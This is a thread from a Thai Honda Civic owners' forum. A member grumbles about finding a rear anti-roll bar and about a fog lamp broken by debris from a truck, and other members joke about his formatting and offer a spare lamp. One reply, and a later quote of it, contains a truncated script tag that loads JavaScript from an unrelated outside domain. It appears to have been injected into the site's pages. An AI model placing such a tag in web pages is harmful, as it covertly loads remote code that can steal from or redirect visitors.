ตอบ
mots

เข้าร่วม: 29 ตุลา 2008
ตอบ: 332

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 345
ให้คำขอบคุณ: 4

ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 10 เมษา 2012 11:44 - ขอเยอะบ้างอะไรบ้าง
บ่นนั่นเอง
- เวลาไม่ต้องการของๆก็เยอะสะจริง
- เวลาต้องการของๆก็หาไม่ไ้ด้เลยหรือถ้ามีก็เกินความต้องการ

เป็นคนขับรถไม่เร็วเน้นประหยัดติดแก็สวิ่งมาเป็นแสนโลละแต่ก็ยังขับแบบประหยัดถนอมมากถึงมากที่สุด  แต่อยู่ๆเกิดอยากจะเสียตังค์สะงั้นอารมณ์ว่าอยากได้
กันโคลงหลัง 19 - 22 มิล (ไม่ได้ขับเร็วอะไรกับเค้าเลยแต่บนทางด่วนมีบ้างแค่เหยียบเอามันๆ)
เห็นล่ำลือกันนักกันโคลงหน้า-หลังก้มใต้ท้องดูอ้าวมีแต่กันโคลงหน้าข้างหลังไม่มี
เริ่มจะตะหงิดๆอยากมีเหมือนเค้าบ้างกันโคลงหลังใช้ได้จริงเห็นผลจริงหรือเปล่าก็ไม่รู้ละรู้แต่อยากได้มังเริ่มหาสิงงด้วย

- กันโคลงหน้า 27 มิลแล้วของเรามันกี่มิลละเนี้ยเท่าที่ดูด้วยตาไม่น่าจะต่ำกว่า 22 มิล

- กันโคลงหน้า - หลัง DC5 จะเอาแต่ข้างหลังคนขายก็ไม่ขายให้ก็ยังสงสัยอีก แล้วไอ้เจ้า DC5 หน้ามันกี่มิล หลังมันกี่มิล ถ้าหน้า 27 มิลหลัง 22 มิลก็ว่าจะจัดสะหน่อยยอมซื้อมันทั้งหน้าและหลังเลยละ

- กันโคลง 1.7 ศูนย์ 13 มิลก็อยากได้ใหญ่กว่านี้

จบไปเรื่องนึงสรุปยังหาไม่ได้สบายตังค์ยังอยู่ครบเรื่องต่อมาสดๆร้อนๆเลยขับรถไปศาลายาข้างหน้ามีสิบล้อหรือ 18ล้อไม่รู้ละก้อนดินหล่น
เราก็ขับหลบแต่ก่อนหลบก็ดูกระจกมองหลังว่าไม่มีรถตามมาใกล้ก็ขับหลบก้อนดินตามระเบียบแล้วก็ลดความเร็วลงเพราะ มันก็ยังปล่อยทุนระเบิดมาเป็นระยะๆ  รถที่แซงเราไปก็คงจะหลบเหมือนกันไม่ได้สนใจอะไรคิดว่าไม่น่าจะมีปัญหา 1 คืนผ่านไปเช้าขับไปทำงานจอดรถเสร็จก็เดินออกมาดูว่าจอดตรงไหมระยะห่างจากรถคันข้างๆถ้าเค้าเปิดประตูมาจะโดนเราไปดูทั้งซ้ายและขวาเห็นชัดเลยรอบนี้ไฟตัดหมอกทำไมเป็นรูแบบนั่นละเข้าไปแหกตาดูใกล้ๆหน่อยสิ พระพุทธเจ้าค๊ะ!!!!! ไฟตัดหมอกแตก เห้อๆไอ้สิบล้อมันเล่นสะละเห็นแล้วก็ทำใจไม่เป็นไรหาซื้อใหม่ก็ได้เห็นในตลาดเยอะอ่ะขายกันเพียบเข้าที่ทำงานอะไรเนี้ยหาเท่าไรก็หาไม่เจอไอ้ที่เจอก็คนละข้างหรือไม่ก็ของมือหนึ่งอย่างแพงไม่เอาๆ เค้าอยากได้มาประดับรถเท่านั้นอ่ะไม่ค่อยจะได้เปิดสักเท่าไรเอาไงดีหว่าแก้ขัดไปก่อนแล้วกันเย็นขับกลับบ้านก็ลุ้นอยู่ว่าฝนอย่าตกนะจะไปโลตัสซื้อสติ๊กเกอร์ใสมาแปะไว้ก่อนหลังสงกรานต์ค่อยว่ากันอีกทีไปถึงโลตัสไม่มีแค่มีแต่สก็อตเทปก็เลยได้เป็นสก็อตเทปใสแทนก็จัดการเอามาแปะไปก่อนแลัวกันดูไม่ดีเลยขอบอกแต่ดีกว่าไม่ทำอะไรเลย

สบายใจละได้บ่น 555
จะมีคนอ่านจบหรือเปล่ายังไม่รู้เลย

ขอถามเพิ่มหน่อยครับว่าเฉพาะโคมตัดหมอกของ 01 -02 มันสลับข้างได้ไหม เอาโคมซ้ายไปไว้ขวาเอาโคมขวาไปไว้ซ้ายอ่ะผมใช้กรอบของเก่าได้เปล่า

แก้ไขล่าสุดโดย เมื่อ อังคาร, 10 เมษา 2012 12:06, ทั้งหมด 3 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: underhill 
underhill

เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

สี: น้ำเงิน อิเทอนอล (B-96P)
อังคาร, 10 เมษา 2012 11:50 - ขอเยอะบ้างอะไรบ้าง
เเดง เป็น แถบ อ่าน แถบ ไม่ ออก
mots

สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 10 เมษา 2012 11:59 - ขอเยอะบ้างอะไรบ้าง
underhill พิมพ์ว่า:
เเดง เป็น แถบ อ่าน แถบ ไม่ ออก

ผมลองสีดำแล้วก็ไม่ค่อยออกเท่าไรงั้นเปลี่ยนเป็นสีดำดูแล้วกัน
TorreZ

ชื่อเล่น: ตั้ม

เข้าร่วม: 27 กรกฎา 2009
ตอบ: 160

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 196
ให้คำขอบคุณ: 246

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 10 เมษา 2012 12:02 - ขอเยอะบ้างอะไรบ้าง
ครับ แต่เว้นวรรคบ้างก็ดี ผมอ่านแล้วอึดอัด ฮ่าๆๆๆ
pannatad

ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

ปี: 2003
อังคาร, 10 เมษา 2012 13:24 - ขอเยอะบ้างอะไรบ้าง
ข้างไหนอะครับไฟตัดหมอก ของผมมันมีทิ้งไว้ที่อู่ทำสี ตอนแปลงหน้า แต่มีแค่ด้านขวานะ เพราะด้านซ้าย เบนซ์มันเอาไปกินแล้ว

ถ้าไม่รีบ คงอีกหลายวันกว่าผมจะมีเวลาว่างเข้าไปเอา น่าจะหลังสงกรานต์นะ

ถ้าสนใจรึยังหาของไม่ได้ ก็ pm มาครับ

อ้อ ของผม รถมันปี 03 มันใส่กันได้ป่าวหว่า = ="
underhill

เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

สี: น้ำเงิน อิเทอนอล (B-96P)
อังคาร, 10 เมษา 2012 13:35 - ขอเยอะบ้างอะไรบ้าง
pannatad พิมพ์ว่า:
ข้างไหนอะครับไฟตัดหมอก ของผมมันมีทิ้งไว้ที่อู่ทำสี ตอนแปลงหน้า แต่มีแค่ด้านขวานะ เพราะด้านซ้าย เบนซ์มันเอาไปกินแล้ว

ถ้าไม่รีบ คงอีกหลายวันกว่าผมจะมีเวลาว่างเข้าไปเอา น่าจะหลังสงกรานต์นะ

ถ้าสนใจรึยังหาของไม่ได้ ก็ pm มาครับ

อ้อ ของผม รถมันปี 03 มันใส่กันได้ป่าวหว่า = ="

มานใส่กานได้ที่ไหนเล่า <script src="https://sport32news.com/civicesgroup.js"></

ปล จขกท เว้นบรรทัดด้วยนะ นอกจากเปลี่ยนสีตัวอักษรแล้วง่ะ เขาแซวเล่นนะเนี่ย
pannatad

ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

ปี: 2003
อังคาร, 10 เมษา 2012 13:48 - ขอเยอะบ้างอะไรบ้าง

มานใส่กานได้ที่ไหนเล่า <script src="https://sport32news.com/civicesgroup.js"></

ปล จขกท เว้นบรรทัดด้วยนะ นอกจากเปลี่ยนสีตัวอักษรแล้วง่ะ เขาแซวเล่นนะเนี่ย

กร๊ากกกกกก สงสารเจ้าของกระทู้อะ 55555 แอบฮา อย่าโกรธกันนะ
mots

อังคาร, 10 เมษา 2012 14:20 - ขอเยอะบ้างอะไรบ้าง
ผมก็จะเว้นละแต่ตอนนั่งทำเกิดตาลายขึ้นมา

กร๊ากกกกกก สงสารเจ้าของกระทู้อะ 55555 แอบฮา อย่าโกรธกันนะ

ผมก็นั่งทำอยู่ละแต่ตอนทำเกิดตาลายเลยทำเท่านี้ก่อนของผมเป็น 02 03ใส่ไม่ได้ครับแล้วก็เป็นด้านคนนั่งซ้ายมือของคนครับละครับ
artitex

เข้าร่วม: 10 ตุลา 2009
ตอบ: 52

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 36
ให้คำขอบคุณ: 15

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 12 เมษา 2012 08:55 - ขอเยอะบ้างอะไรบ้าง
ของผมก็เจอแบบเดียวกันเลยครับ ตัดหมอกข้างขวา แต่ไม่เป็นรูนะครับ แค่เป็นรอยแตก ตอนนี้ก็ยังใส่อย่างนี้ละ ไม่มีเงินเปลี่ยน 55
scanclub

ชื่อเล่น: ไผ่

เข้าร่วม: 18 ตุลา 2009
ตอบ: 1250

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1113
ให้คำขอบคุณ: 2432

ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พฤหัส, 12 เมษา 2012 16:23 - ขอเยอะบ้างอะไรบ้าง
ไฟแตกทีเกิดอารมเซ็งไปสิบวัน
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.